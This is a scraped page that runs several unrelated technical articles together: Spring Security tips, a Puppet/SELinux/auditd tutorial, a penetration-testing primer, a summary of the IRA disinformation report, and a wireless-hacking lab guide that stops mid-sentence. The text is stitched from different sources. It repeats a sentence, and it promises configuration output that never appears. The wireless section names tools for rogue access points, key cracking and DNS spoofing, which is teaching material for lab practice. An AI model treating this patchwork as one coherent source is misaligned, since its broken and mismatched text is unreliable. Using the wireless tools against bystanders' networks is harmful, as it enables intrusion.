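If you prefer to stay offline, a shell one-liner does the decoding just as well. This is only a sketch: the token below is generated on the spot purely for illustration (it mimics the username:expiry:signature layout of a token-based remember me cookie) and is not a real Spring Security value.

# Fabricate a cookie-like value for demonstration purposes only
TOKEN=$(printf 'admin:1300000000000:signature' | base64)
echo "$TOKEN"

# Decode it again; if a value copied from the browser lacks padding, append '=' by hand
printf '%s' "$TOKEN" | base64 -d
echo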
Making effective use of an in-memory UserDetailsService
Tip: A very common scenario for the use of an in-memory UserDetailsService and hard-coded user lists is the authoring of unit tests for secured components. Unit test authors often code or configure the minimal context to test the functionality of the component under test. Using an in-memory UserDetailsService with a well-defined set of users and GrantedAuthority values provides the test author with an easily controlled test environment.

Storing sensitive information
Tip: Many guidelines that apply to the storage of passwords apply equally to other types of sensitive information, including social security numbers and credit card information (although, depending on the application, some of these may require the ability to decrypt). It's quite common for databases storing this type of information to represent it in multiple ways; for example, a customer's full 16-digit credit card number would be stored in a highly encrypted form, but the last four digits might be stored in cleartext (for reference, think of any internet commerce site that displays XXXX XXXX XXXX 1234 to help you identify your stored credit cards).

Annotations at the class level
Tip: Be aware that method-level security annotations can also be applied at the class level! Method-level annotations, if supplied, will always override annotations specified at the class level. This can be helpful if your business needs dictate the specification of security policies for an entire class at a time. Take care to use this functionality in conjunction with good comments and coding standards, so that developers are very clear about the security characteristics of a class and its methods.

Authenticating the user against LDAP
Tip: Do not make the very common mistake of configuring an <authentication-provider> with a user-details-service-ref referring to an LdapUserDetailsService if you are intending to authenticate the user against LDAP itself!

Externalize URLs and environment-dependent settings
Tip: Coding URLs into Spring configuration files is a bad idea. Typically, storage of and consistent reference to URLs is pulled out into a separate properties file, with placeholders consistent with the Spring PropertyPlaceholderConfigurer. This allows for reconfiguration of environment-specific settings via externalizable properties files without touching the Spring configuration files, and is generally considered good practice.

Summary
In this article we took a look at some tips and tricks for Spring Security.

Further resources on this subject:
Spring Security 3 [Book]
Migration to Spring Security 3 [Article]
Opening up to OpenID with Spring Security [Article]
Spring Security: Configuring Secure Passwords [Article]

Puppet and OS Security Tools

Packt
27 Mar 2015
17 min read
In this article by Jason Slagle, author of the book Learning Puppet Security, we cover using Puppet to manage SELinux and auditd. We have learned a lot so far about using Puppet to secure your systems, as well as how to use it to make groups of systems more secure. However, in all of that, we've not yet covered some of the basic OS-level functions that are available to secure a system. In this article, we'll review several of those functions.

SELinux is a powerful tool in the security arsenal. Most administrators' experience with it is along the lines of "how can I turn that off?" This is born out of frustration with the poor documentation about the tool, as well as the tedious nature of its configuration. While Puppet cannot help you with the documentation (which is getting better all the time), it can help you with some of the other challenges that SELinux can bring; that is, ensuring that the proper contexts and policies are in place on the systems being managed.

In this article, we'll cover the following topics related to OS-level security tools:
A brief introduction to SELinux and auditd
The built-in Puppet support for SELinux
Community modules for SELinux
Community modules for auditd

At the end of this article, you should have enough skills that you no longer need to disable SELinux. However, if you still need to do so, it is certainly possible via the modules presented here.

Introducing SELinux and auditd

During the course of this article, we'll explore the SELinux framework for Linux and see how to automate it using Puppet. As part of the process, we'll also review auditd, the logging and auditing framework for Linux. Using Puppet, we can automate the configuration of these often-neglected security tools, and even move the configuration of these tools for various services into the modules that configure those services.

The SELinux framework

SELinux is a security system for Linux originally developed by the United States National Security Agency (NSA). It is an in-kernel protection mechanism designed to provide Mandatory Access Controls (MACs) to the Linux kernel. SELinux isn't the only MAC framework for Linux; AppArmor is an alternative MAC framework included in the Linux kernel since version 2.6.30. We chose to cover SELinux since it is the default framework used under Red Hat Linux, which we're using for our examples. More information on AppArmor can be found at http://wiki.apparmor.net/index.php/Main_Page.

These access controls work by confining processes to the minimal set of files and network access that they require to run. By doing this, the controls limit the amount of collateral damage that can be done by a process that becomes compromised. SELinux was first merged into the Linux mainline kernel for the 2.6.0 release. It was introduced into Red Hat Enterprise Linux with version 4, and into Ubuntu in version 8.04. With each successive release of these operating systems, support for SELinux grows and it becomes easier to use.

SELinux has a couple of core concepts that we need to understand to configure it properly. The first are the concepts of types and contexts. A type in SELinux is a grouping of similar things. Files used by Apache may be of the httpd_sys_content_t type, for instance, which is a type that all content served by HTTP would have. The httpd process itself is of type httpd_t.
These types are applied to objects, which represent discrete things such as files and ports, and become part of the context of that object. The context of an object represents the object's user, role, type, and, optionally, data on multilevel security. For this discussion, the type is the most important component of the context.

Using a policy, we grant access from the subject, which represents a running process, to various objects that represent files, network ports, memory, and so on. We do that by creating a policy that allows a subject to have access to the types it requires to function.

SELinux has three modes that it can operate in. The first of these modes is disabled. As the name implies, the disabled mode runs without any SELinux enforcement. The second mode is called permissive. In permissive mode, SELinux will log any access violations, but will not act on them. This is a good way to get an idea of where you need to modify your policy, or tune Booleans to get proper system operation. The final mode, enforcing, will deny actions that do not have a policy in place. Under Red Hat Linux variants, this is the default SELinux mode. By default, Red Hat 6 runs SELinux with a targeted policy in enforcing mode. This means that, for the targeted daemons, SELinux will enforce its policy by default.

An example is in order here to explain this well. So far, we've been operating with SELinux disabled on our hosts. The first step in experimenting with SELinux is to turn it on. We'll set it to permissive mode at first, while we gather some information. To do this, after starting our master VM, we'll need to modify the SELinux configuration and reboot. While it's possible to change from enforcing mode to either permissive or disabled mode without a reboot, going back requires us to reboot.

Let's edit the /etc/sysconfig/selinux file and set the SELINUX variable to permissive on our puppetmaster. Remember to start the Vagrant machine and SSH in first, as necessary. Once this is done, the file should look as follows:

Once this is complete, we need to reboot. To do so, run the following command:

sudo shutdown -r now

Wait for the system to come back online. Once the machine is back up and you SSH back into it, run the getenforce command. It should return permissive, which means SELinux is running, but not enforcing.

Now, we can make sure our master is running and take a look at its context. If it's not running, you can start the service with the sudo service puppetmaster start command. We'll use the -Z flag on the ps command to examine the SELinux context. Many commands, such as ps and ls, use the -Z flag to view SELinux data. We'll go ahead and run the following command to view the SELinux data for the running puppetmaster:

ps -efZ | grep puppet

When you do this, you'll see output such as the following:

unconfined_u:system_r:initrc_t:s0 puppet 1463     1 1 11:41 ? 00:00:29 /usr/bin/ruby /usr/bin/puppet master

If you take a look at the first part of the output line, you'll see that Puppet is running in the unconfined_u:system_r:initrc_t context. This is actually somewhat of a bug, and a result of the Puppet policy on CentOS 6 being out of date. We should actually be running under the system_u:system_r:puppetmaster_t:s0 context, but the policy is for a much older version of Puppet, so it runs unconfined. Let's take a look at the sshd process to see what it looks like also.
Let's take a look at the sshd process to see what it looks like as well. To do so, we'll just grep for sshd instead:

ps -efZ|grep sshd

The output is as follows:

system_u:system_r:sshd_t:s0-s0:c0.c1023 root 1206 1 0 11:40 ? 00:00:00 /usr/sbin/sshd

This is the more traditional output one would expect. The sshd process is running under the system_u:system_r:sshd_t context. This corresponds to the system user, the system role, and the sshd type. The user and role are SELinux constructs that enable role-based access control. SELinux users do not map to system users; instead, they allow us to set policy based on the SELinux user object, which is what makes role-based access control possible. The unconfined user we saw earlier is a user on which policy is not enforced.

Now, we can take a look at some objects. Running the ls -lZ /etc/ssh command lists the contexts of the files in that directory. Each of the files belongs to a context that includes the system user, as well as the object role. They are split between the etc type for configuration files and the sshd_key type for keys. The SSH policy allows the sshd process to read both of these file types. Other policies, say for NTP, would potentially allow the ntpd process to read the etc types, but it would not be able to read the sshd_key files.

This very fine-grained control is the power of SELinux. However, with great power comes very complex configuration, and it is easy to get wrong. For instance, if Puppet deploys a file with the wrong type, the confined service may be unable to use it. Fortunately, in permissive mode, we will log data that we can use to assist us with this. This leads us into the second half of the system that we wish to discuss, which is auditd. In the meantime, there is plenty of information on SELinux available on its website at http://selinuxproject.org/page/Main_Page. There's also a very funny, but informative, resource describing SELinux at https://people.redhat.com/duffy/selinux/selinux-coloring-book_A4-Stapled.pdf.

The auditd framework for audit logging

SELinux does a great job of limiting access to system components; however, reporting on what enforcement took place was not one of its objectives. Enter auditd, an auditing framework developed by Red Hat. It is a complete auditing system that uses rules to indicate what to audit, and it can be used to log SELinux events, as well as much more.

Under the hood, auditd has hooks into the kernel to watch system calls and other processes. Using the rules, you can configure logging for any of these events. For instance, you can create a rule that monitors writes to the /etc/passwd file. This would allow you to see whether any users were added to the system. We can also add monitoring of files such as lastlog and wtmp to monitor login activity. We'll explore this example later when we configure auditd.

To quickly see how a rule works, we'll manually configure a quick rule that will log when the wtmp file is modified. This will add some system logging around users logging in. To do this, let's edit the /etc/audit/audit.rules file and add the following lines:

-w /var/log/wtmp -p wa -k logins
-w /etc/passwd -p wa -k password

We'll take a look at what the preceding lines do. Both lines start with the -w flag, which indicates the file that we are monitoring. Second, we have the -p flag. This sets which file operations we monitor; in this case, it is write and append operations.
Finally, with the -k entries, we're setting a keyword that is logged and can be filtered on. These rules should go at the end of the file. Once that's done, reload auditd with the following command:

sudo service auditd restart

Once this is complete, go ahead and open another SSH session, and then simply log back out. Once this is done, take a look at the /var/log/audit/audit.log file. You should see content like the following:

type=SYSCALL msg=audit(1416795396.816:482): arch=c000003e syscall=2 success=yes exit=8 a0=7fa983c446aa a1=1 a2=2 a3=7fff3f7a6590 items=1 ppid=1206 pid=2202 auid=500 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=51 comm="sshd" exe="/usr/sbin/sshd" subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 key="logins"
type=SYSCALL msg=audit(1416795420.057:485): arch=c000003e syscall=2 success=yes exit=7 a0=7fa983c446aa a1=1 a2=2 a3=8 items=1 ppid=1206 pid=2202 auid=500 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=51 comm="sshd" exe="/usr/sbin/sshd" subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 key="logins"

There are plenty of fields in this output, including the SELinux context, the user ID, and so on. Of particular interest is auid, the audit user ID. For commands run via the sudo command, this still contains the user ID of the user who called sudo, which makes it a great way to log commands performed via sudo.

Auditd also logs SELinux failures. They get logged under the type AVC. These access vector cache logs will be placed in the auditd log file whenever a SELinux violation occurs.

Much like SELinux, auditd is somewhat complicated, and its intricacies are beyond the scope of this book. You can get more information at http://people.redhat.com/sgrubb/audit/. Before we move on to Puppet's native SELinux support, the sketch below shows how the two audit rules we just added by hand could be delivered by Puppet instead.
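This sketch is not code from the book; it shows one possible shape for such a profile on the Red Hat 6 layout used here. The class name is invented, and a real module would normally template the entire audit.rules file, including the distribution's default header entries, rather than shipping only these two watches.

# Hypothetical profile: manage the audit rules file and keep auditd running.
class profiles::auditd {
  package { 'audit':
    ensure => installed,
  }

  # Replaces the whole file; include any default -D/-b header lines your
  # distribution ships if you adopt this approach for real.
  file { '/etc/audit/audit.rules':
    ensure  => file,
    owner   => 'root',
    group   => 'root',
    mode    => '0640',
    content => "-w /var/log/wtmp -p wa -k logins\n-w /etc/passwd -p wa -k password\n",
    require => Package['audit'],
    notify  => Service['auditd'],
  }

  service { 'auditd':
    ensure => running,
    enable => true,
  }
}

The notify relationship restarts auditd whenever the rules change, which mirrors the manual service auditd restart step above.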
SELinux and Puppet

Puppet has direct support for several features of SELinux. There are two native Puppet types for SELinux: selboolean and selmodule. These types support setting SELinux Booleans and installing SELinux policy modules, respectively.

SELinux Booleans are variables that affect how SELinux behaves; setting them permits or denies various functions. For instance, you set a SELinux Boolean to allow the httpd process to access network ports. SELinux modules are groupings of policies. They allow policies to be loaded in a more granular way, and the Puppet selmodule type allows Puppet to load these modules.

The selboolean type

The targeted SELinux policy that most distributions use is based on the SELinux reference policy. One of the features of this policy is the use of Boolean variables that control actions of the policy. There are over 200 of these Booleans on a Red Hat 6-based machine. We can investigate them by installing the policycoreutils-python package on the operating system. You can do this by executing the following command:

sudo yum install policycoreutils-python

Once installed, we can run the semanage boolean -l command to get a list of the Boolean values, along with their descriptions. The output shows that there is a very large number of settings that can be reconfigured simply by setting the appropriate Boolean value.

The selboolean Puppet type supports managing these Boolean values. The type is fairly simple, accepting the following parameters:

name: The name of the Boolean to be set. It defaults to the title.
persistent: Whether to write the value to disk for the next boot.
provider: The provider for the type. Usually, the default getsetsebool provider is accepted.
value: The value of the Boolean, on or off.

Usage of this type is rather simple. We'll show an example that sets the puppetmaster_use_db Boolean to on. If we were using the SELinux Puppet policy, this would allow the master to talk to a database. For our purposes, it's a simple unused variable that we can use for demonstration. As a reminder, the SELinux policy for Puppet on CentOS 6 is outdated, so setting the Boolean does not impact the version of Puppet we're running. It does, however, serve to show how a Boolean is set.

To do this, we'll create a sample role and profile for our puppetmaster. This is something that would likely exist in a production environment to manage the configuration of the master. In this example, we'll simply build a small profile and role for the master.

Let's start with the profile. Copy over the profiles module we've slowly been building up, and let's add a puppetmaster.pp profile. To do so, edit the profiles/manifests/puppetmaster.pp file and make it look as follows:

class profiles::puppetmaster {
  selboolean { 'puppetmaster_use_db':
    value      => on,
    persistent => true,
  }
}

Then, we'll move on to the role. Copy the roles module, edit the roles/manifests/puppetmaster.pp file, and make it look as follows:

class roles::puppetmaster {
  include profiles::puppetmaster
}

Once this is done, we can apply it to our host. Edit the /etc/puppet/manifests/site.pp file. We'll apply the puppetmaster role to the puppetmaster machine, as follows:

node 'puppet.book.local' {
  include roles::puppetmaster
}

Now, when we run Puppet, the agent reports that it set the value to on. Using this method, we can set any of the SELinux Boolean values we need for our system to operate properly. More information on SELinux Booleans, including how to obtain a list of them, can be found at https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/Security-Enhanced_Linux/sect-Security-Enhanced_Linux-Working_with_SELinux-Booleans.html.

The selmodule type

The other native type inside Puppet is a type to manage SELinux modules. Modules are compiled collections of SELinux policy. They're loaded into the kernel using the selmodule command, and this Puppet type provides support for that mechanism. The available parameters are as follows:

name: The name of the module; it defaults to the title.
ensure: The desired state, present or absent.
provider: The provider for the type; it should be selmodule.
selmoduledir: The directory that contains the module to be installed.
selmodulepath: The complete path to the module to be installed, if it is not present in selmoduledir.
syncversion: Whether to resync the module if a new version is found, much like ensure => latest.

Using this type, we can serve a compiled module onto the system with Puppet and then ensure that it gets installed, which lets us centrally manage the module. Later, we'll see an example where a community module compiles a policy and then installs it, so we won't build out a full example here; the short sketch that follows shows only the shape of the resource.
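This sketch is purely illustrative and not taken from the book. The module name puppet_extras and the file source path are invented; note that compiled SELinux policy packages use the .pp extension, which is easy to confuse with a Puppet manifest but is a different kind of file entirely.

# Hypothetical example: ship a compiled policy package and load it.
class profiles::selinux_policy {
  # The .pp file here is a compiled SELinux policy package, not a manifest.
  file { '/usr/share/selinux/targeted/puppet_extras.pp':
    ensure => file,
    owner  => 'root',
    group  => 'root',
    mode   => '0644',
    source => 'puppet:///modules/profiles/selinux/puppet_extras.pp',
  }

  selmodule { 'puppet_extras':
    ensure       => present,
    selmoduledir => '/usr/share/selinux/targeted',
    syncversion  => true,
    require      => File['/usr/share/selinux/targeted/puppet_extras.pp'],
  }
}

Serving the compiled package from the module's files directory keeps the policy under version control alongside the manifests that use it.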
With the native types covered, we'll move on to the last SELinux-related component in Puppet.

File parameters for SELinux

The final piece of internal support for SELinux comes in the form of parameters on the file type. The file type parameters are as follows:

selinux_ignore_defaults: By default, Puppet will use the matchpathcon function to set the context of a file. Setting this to true overrides that behavior.
selrange: This sets the SELinux range component. We've not really covered this; it's not used in most mainstream distributions at the time this book was written.
selrole: This sets the SELinux role on the file.
seltype: This sets the SELinux type on the file.
seluser: This sets the SELinux user on the file.

Usually, if you place files in the correct location (the expected location for a service) on the filesystem, Puppet will get the SELinux properties correct via its use of the matchpathcon function. This function (which also has a matching utility) applies a default context based on the policy settings. Setting the context manually is useful in cases where you're storing data outside the normal location. For instance, you might be storing web data under /opt.

The preceding types and providers provide the basics that allow you to manage SELinux on a system. We'll now take a look at a couple of community modules that build on these types and create a more in-depth solution.

Summary

This article looked at what SELinux and auditd are, and gave brief examples of how they can be used to secure your systems. After this, we looked at the specific support for SELinux in Puppet: the two built-in types, as well as the parameters on the file type. Then, we took a look at one of the several community modules for managing SELinux. Using this module, we can store the policies as text instead of compiled blobs.

Resources for Article:

Further resources on this subject:

The anatomy of a report processor [Article]
Module, Facts, Types and Reporting tools in Puppet [Article]
Designing Puppet Architectures [Article]
Fundamentals

Packt
20 Jan 2014
4 min read
Vulnerability Assessment and Penetration Testing

Vulnerability Assessment (VA) and Penetration Testing (PT or PenTest) are the most common types of technical security risk assessments or technical audits conducted using different tools. These tools provide the best outcomes if they are used optimally. An improper configuration may lead to multiple false positives that may or may not reflect true vulnerabilities. Vulnerability assessment tools are widely used by everyone, from small organizations to large enterprises, to assess their security status. This helps them make timely decisions to protect themselves from these vulnerabilities. This article covers Vulnerability Assessments and PenTests using Nessus, a widely recognized tool for such purposes, and introduces you to the basic terminology for these two types of assessments.

A vulnerability, in terms of IT systems, can be defined as a potential weakness in a system or infrastructure that, if exploited, can result in the realization of an attack on the system. An example of a vulnerability is a weak, dictionary-word password in a system that can be exploited by a brute force attack (dictionary attack) attempting to guess the password. This may result in the password being compromised and an unauthorized person gaining access to the system.

Vulnerability Assessment is a phase-wise approach to identifying the vulnerabilities existing in an infrastructure. This can be done using automated scanning tools such as Nessus, which uses its set of plugins corresponding to different types of known security loopholes in infrastructure, or a manual checklist-based approach that uses best practices and published vulnerabilities on well-known vulnerability tracking sites. The manual approach is not as comprehensive as a tool-based approach and will be more time-consuming. The kinds of checks that are performed by a vulnerability assessment tool can also be done manually, but this will take a lot more time than an automated tool.

Penetration Testing adds a further step to vulnerability assessment: exploiting the vulnerabilities. Penetration Testing is an intrusive test, where the personnel doing the penetration test will first do a vulnerability assessment to identify the vulnerabilities and, as a next step, will try to penetrate the system by exploiting the identified vulnerabilities.

Need for Vulnerability Assessment

It is very important for you to understand why Vulnerability Assessment or Penetration Testing is required. Though there are multiple direct or indirect benefits of conducting a vulnerability assessment or a PenTest, a few of them have been recorded here for your understanding.

Risk prevention

Vulnerability Assessment uncovers the loopholes, gaps, and vulnerabilities in the system. By running these scans on a periodic basis, an organization can identify known vulnerabilities in the IT infrastructure in time. Vulnerability Assessment reduces the likelihood of noncompliance with the various compliance and regulatory requirements, since you already know your vulnerabilities. Awareness of such vulnerabilities in time can help an organization fix them and mitigate the risks involved before they get exploited.
The risks of a vulnerability being exploited include:

Financial loss due to vulnerability exploits
Damage to the organization's reputation
Data theft
Confidentiality compromise
Integrity compromise
Availability compromise

Compliance requirements

The well-known information security standards (for example, ISO 27001, PCI DSS, and PA DSS) have control requirements that mandate that a Vulnerability Assessment must be performed. A few countries have specific regulatory requirements for conducting Vulnerability Assessments in some specific industry sectors, such as banking and telecom.

The life cycles of Vulnerability Assessment and Penetration Testing

This section describes the key phases in the life cycles of VA and PenTest. These life cycles are almost identical; Penetration Testing involves the additional step of exploiting the identified vulnerabilities. It is recommended that you perform testing based on the requirements and business objectives of testing in an organization, be it Vulnerability Assessment or Penetration Testing. The following stages are involved in this life cycle, and are typically followed in sequence:

Scoping
Information gathering
Vulnerability scanning
False positive analysis
Vulnerability exploitation (Penetration Testing)
Report generation

Summary

In this article, we covered an introduction to Vulnerability Assessment and Penetration Testing, along with an introduction to Nessus as a tool and steps on installing and setting up Nessus.

Resources for Article:

Further resources on this subject:

CISSP: Vulnerability and Penetration Testing for Access Control [Article]
Penetration Testing and Setup [Article]
Web app penetration testing in Kali [Article]
How IRA hacked American democracy using social media and meme warfare to promote disinformation and polarization: A new report to Senate Intelligence Committee

Natasha Mathur
18 Dec 2018
9 min read
A new report prepared for the Senate Intelligence Committee by the cybersecurity firm, New Knowledge was released yesterday. The report titled “The Tactics & Tropes of the Internet Research Agency” provides an insight into how IRA a group of Russian agents used and continue to use social media to influence politics in America by exploiting the political and racial separation in American society.   “Throughout its multi-year effort, the Internet Research Agency exploited divisions in our society by leveraging vulnerabilities in our information ecosystem. We hope that our work has resulted in a clearer picture for policymakers, platforms, and the public alike and thank the Senate Select Committee on Intelligence for the opportunity to serve”, says the report. Russian interference during the 2016 Presidential Elections comprised of Russian agents trying to hack the online voting systems, making cyber-attacks aimed at Democratic National Committee and Russian tactics of social media influence to exacerbate the political and social divisions in the US. As a part of SSCI’s investigation into IRA’s social media activities, some of the social platforms companies such as Twitter, Facebook, and Alphabet that were misused by the IRA, provided data related to IRA influence tactics. However, none of these platforms provided complete sets of related data to SSCI. “Some of what was turned over was in PDF form; other datasets contained extensive duplicates. Each lacked core components that would have provided a fuller and more actionable picture. The data set provided to the SSCI for this analysis includes data previously unknown to the public.and..is the first comprehensive analysis by entities other than the social platforms”, reads the report.   The report brings to light IRA’s strategy that involved deciding on certain themes, primarily social issues and then reinforcing these themes across its Facebook, Instagram, and YouTube content. Different topics such as black culture, anti-Clinton, pro-trump, anti-refugee, Muslim culture, LGBT culture, Christian culture, feminism, veterans, ISIS, and so on were grouped thematically on Facebook Pages and Instagram accounts to reinforce the culture and to foster the feelings of pride.  Here is a look at some key highlights from the report. Key Takeaways IRA used Instagram as the biggest tool for influence As per the report, Facebook executives, during the Congressional testimony held in April this year, hid the fact that Instagram played a major role in IRA’s influence operation. There were about 187 million engagements on Instagram compared to 76.5 million on Facebook and 73 million on Twitter, according to a data set of posts between 2015 and 2018. In 2017, IRA moved much of its activity and influence operations to Instagram as media started looking into Facebook and Twitter operations. Instagram was the most effective platform for the Internet Research Agency and approximately 40% of Instagram accounts achieved over 10,000 followers (a level referred to as “micro-influencers” by marketers) and twelve of these accounts had over 100,000 followers (“influencer” level).                                     The Tactics & Tropes of IRA “Instagram engagement outperformed Facebook, which may indicate its strength as a tool in image-centric memetic (meme) warfare. Our assessment is that Instagram is likely to be a key battleground on an ongoing basis,” reads the report. Apart from social media posts, another feature of Instagram platform activity by IRA was merchandise. 
This merchandise promotion aimed at building partnerships for boosting audience growth and getting the audience data. This was especially evident in the black targeted communities with hashtags #supportblackbusiness and #buyblack appearing quite frequently. In fact, sometimes these IRA pages also offered coupons in exchange for sharing content.                                               The Tactics & Tropes of IRA IRA promoted Voter Suppression Operations The report states that although Twitter and Facebook were debating on determining if there was any voter suppression content present on these platforms, three major variants of voter suppression narratives was found widespread on Twitter, Facebook, Instagram, and YouTube.  These included malicious misdirection (eg: tweets promoting false voting rules), candidates supporting redirection, and turnout depression ( eg: no need to vote, your vote doesn’t matter). The Tactics & Tropes of IRA For instance, few days before the 2016 presidential elections in the US, IRA started to implement voter suppression tactics on the Black-community targeted accounts. IRA started to spread content about voter fraud and delivering warnings that “election would be stolen and violence might be necessary”. These suppression narratives and content was largely targeted almost exclusively at the Black community on Instagram and Facebook. There was also the promotion of other kinds of content on topics such as alienation and violence to divert people’s attention away from politics. Other varieties of voter suppression narratives include: “don’t vote, stay home”, “this country is not for Black people”, “these candidates don’t care about Black people”, etc. Voter-suppression narratives aimed at non-black communities focused primarily on promoting identity and pride for communities like Native Americans, LGBT+, and Muslims. The Tactics & Tropes of IRA Then there were narratives that directly and broadly called out for voting for candidates apart from Hillary Clinton and pages on Facebook that posted repeatedly about voter fraud, stolen elections, conspiracies about machines provided by Soros, and rigged votes. IRA largely targeted black American communities IRA’s major efforts over Facebook and Instagram were targeted at Black communities in America and involved developing and recruiting Black Americans as assets. The report states that IRA adopted a cross-platform media mirage strategy which shared authentic black related content to create a strong influence on the black community over social media.   An example presented in the report is that of a case study of “Black Matters” which illustrates the extent to which IRA created “inauthentic media property” by creating different accounts across the social platforms to “reinforce its brand” and widely distribute its content.  “Using only the data from the Facebook Page posts and memes, we generated a map of the cross-linked properties – other accounts that the Pages shared from, or linked to – to highlight the complex web of IRA-run accounts designed to surround Black audiences,” reads the report. So, an individual who followed or liked one of the Black-community-targeted IRA Pages would get exposed to content from a dozen other pages more. Apart from IRA’s media mirage strategy, there was also the human asset recruitment strategy. It involved posts encouraging Americans to perform different types of tasks for IRA handlers. 
Some of these tasks included requests for contact with preachers from Black churches, soliciting volunteers to hand out fliers, offering free self-defense classes (Black Fist/Fit Black), requests for speakers at protests, etc. These posts appeared in the Black, Left, and Right-targeted groups, although they were mostly present in the black groups and communities. “The IRA exploited the trust of their Page audiences to develop human assets, at least some of whom were not aware of the role they played. This tactic was substantially more pronounced on Black-targeted accounts”, reads the report. IRA also created domain names such as blackvswhite.info, blackmattersusa.com, blacktivist.info, blacktolive.org, and so on. It also created YouTube channels like “Cop Block US” and “Don’t Shoot” to spread anti-Clinton videos. In response to these reports of specific black targeting at Facebook, National Association for the Advancement of Colored People (NAACP) returned a donation from Facebook and called on its users yesterday to log out of all Facebook-owned products such as Facebook, Instagram, and Whatsapp today. “NAACP remains concerned about the data breaches and numerous privacy mishaps that the tech giant has encountered in recent years, and is especially critical about those which occurred during the last presidential election campaign”, reads the NAACP announcement. IRA promoted Pro-Trump and anti-Clinton operations As per the report, IRA focussed on promoting political content surrounding pro-Donald Trump sentiments over different channels and pages regardless of whether these pages targeted conservatives, liberals, or racial and ethnic groups. The Tactics & Tropes of IRA On the other hand, large volumes of political content articulated anti-Hillary Clinton sentiments among both the Right and Left-leaning communities created by IRA. Moreover, there weren’t any communities or pages on Instagram and Facebook that favored Clinton. There were some pro-Clinton Twitter posts, however, most of the tweets were still largely anti-Clinton. The Tactics & Tropes of IRA Additionally, there were different YouTube channels created by IRA such as Williams & Kalvin, Cop Block US, don’t shoot, etc, and 25 videos across these different channels consisted election-related keywords in their title and all of these videos were anti-Hillary Clinton. An example presented in a report is of one of the political channels, Paul Jefferson, solicited videos for a #PeeOnHillary video challenge for which the hashtag appeared on Twitter and Instagram.  and shared submissions that it received. Other videos promoted by these YouTube channels were “The truth about elections”, “HILLARY RECEIVED $20,000 DONATION FROM KKK TOWARDS HER CAMPAIGN”, and so on. Also, on IRA’s Facebook account, the post with maximum shares and engagement was a conspiracy theory about President Barack Obama refusing to ban Sharia Law, and encouraging Trump to take action. The Tactics & Tropes of IRA Also, the number one post on Facebook featuring Hillary Clinton was a conspiratorial post that was made public a month before the election. The Tactics & Tropes of IRA These were some of the major highlights from the report. However, the report states that there is still a lot to be done with regard to IRA specifically. There is a need for further investigation of subscription and engagement pathways and only these social media platforms currently have that data. 
New Knowledge team hopes that these platforms will provide more data that can speak to the impact among the targeted communities. For more information into the tactics of IRA, read the full report here. Facebook, Twitter takes down hundreds of fake accounts with ties to Russia and Iran, suspected to influence the US midterm elections Facebook plans to change its algorithm to demote “borderline content” that promotes misinformation and hate speech on the platform Facebook’s outgoing Head of communications and policy takes the blame for hiring PR firm ‘Definers’ and reveals more
Wireless and Mobile Hacks

Packt
22 Jul 2014
6 min read
(For more resources related to this topic, see here.) So I don't think it's possible to go to a conference these days and not see a talk on mobile or wireless. (They tend to schedule the streams to have both mobile and wireless talks at the same time—the sneaky devils. There is no escaping the wireless knowledge!) So, it makes sense that we work out some ways of training people how to skill up on these technologies. We're going to touch on some older vulnerabilities that you don't see very often, but as always, when you do, it's good to know how to insta-win. Wireless environment setup This article is a bit of an odd one, because with Wi-Fi and mobile, it's much harder to create a safe environment for your testers to work in. For infrastructure and web app tests, you can simply say, "it's on the network, yo" and they'll get the picture. However, Wi-Fi and mobile devices are almost everywhere in places that require pen testing. It's far too easy for someone to get confused and attempt to pwn a random bystander. While this sounds hilarious, it is a serious issue if that occurs. So, adhere to the following guidelines for safer testing: Where possible, try and test away from other people and networks. If there is an underground location nearby, testing becomes simpler as floors are more effective than walls for blocking Wi-Fi signals (contrary to the firmly held beliefs of anyone who's tried to improve their home network signal). If you're an individual who works for a company, or you know, has the money to make a Faraday cage, then by all means do the setup in there. I'll just sit here and be jealous. Unless it's pertinent to the test scenario, provide testers with enough knowledge to identify the devices and networks they should be attacking. A good way to go is to provide the Mac address as they very rarely collide. (Mac randomizing tools be damned.) If an evil network has to be created, name it something obvious and reduce the access to ensure that it is visible to as few people as possible. The naming convention we use is Connectingtomewillresultin followed by pain, death, and suffering. While this steers away the majority of people, it does appear to attract the occasional fool, but that's natural selection for you. Once again, but it is worth repeating, don't use your home network. Especially in this case, using your home equipment could expose you to random passersby or evil neighbors. I'm pretty sure my neighbor doesn't know how to hack, but if he does, I'm in for a world of hurt. Software We'll be using Kali Linux as the base for this article as we'll be using the tools provided by Kali to set up our networks for attack. Everything you need is built into Kali, but if you happen to be using another build such as Ubuntu or Debian, you will need the following tools: Iwtools (apt-get install iw): This is the wireless equivalent of ifconfig that allows the alteration of wireless adapters, and provides a handy method to monitor them. Aircrack suite (apt-get install aircrack-ng): The basic tools of wireless attacking are available in the Aircrack suite. This selection of tools provides a wide range of services, including cracking encryption keys, monitoring probe requests, and hosting rogue networks. Hostapd (apt-get install hostapd): Airbase-ng doesn't support WPA-2 networks, so we need to bring in the serious programs for serious people. This can also be used to host WEP networks, but getting Aircrack suite practice is not to be sniffed at. 
Wireshark (apt-get install wireshark): Wireshark is one of the most widely used network analytics tools. It's not only used by pen testers, but also by people who have CISSP and other important letters after their names. This means that it's a tool that you should know about. dnschef (https://thesprawl.org/projects/dnschef/): Thanks to Duncan Winfrey, who pointed me in this direction. DNSchef is a fantastic resource for doing DNS spoofing. Other alternatives include DNS spoof and Metasploit's Fake DNS. Crunch (apt-get install crunch): Crunch generates strings in a specified order. While it seems very simple, it's incredibly useful. Use with care though; it has filled more than one unwitting user's hard drive. Hardware You want to host a dodgy network. The first question to ask yourself, after the question you already asked yourself about software, is: is your laptop/PC capable of hosting a network? If your adapter is compatible with injection drivers, you should be fine. A quick check is to boot up Kali Linux and run sudo airmon-ng start <interface>. This will put your adapter in promiscuous mode. If you don't have the correct drivers, it'll throw an error. Refer to a potted list of compatible adapters at http://www.aircrack-ng.org/doku.php?id=compatibility_drivers. However, if you don't have access to an adapter with the required drivers, fear not. It is still possible to set up some of the scenarios. There are two options. The first and most obvious is "buy an adapter." I can understand that you might not have a lot of cash kicking around, so my advice is to pick up an Edimax ew-7711-UAN—it's really cheap and pretty compact. It has a short range and is fairly low powered. It is also compatible with Raspberry Pi and BeagleBone, which is awesome but irrelevant. The second option is a 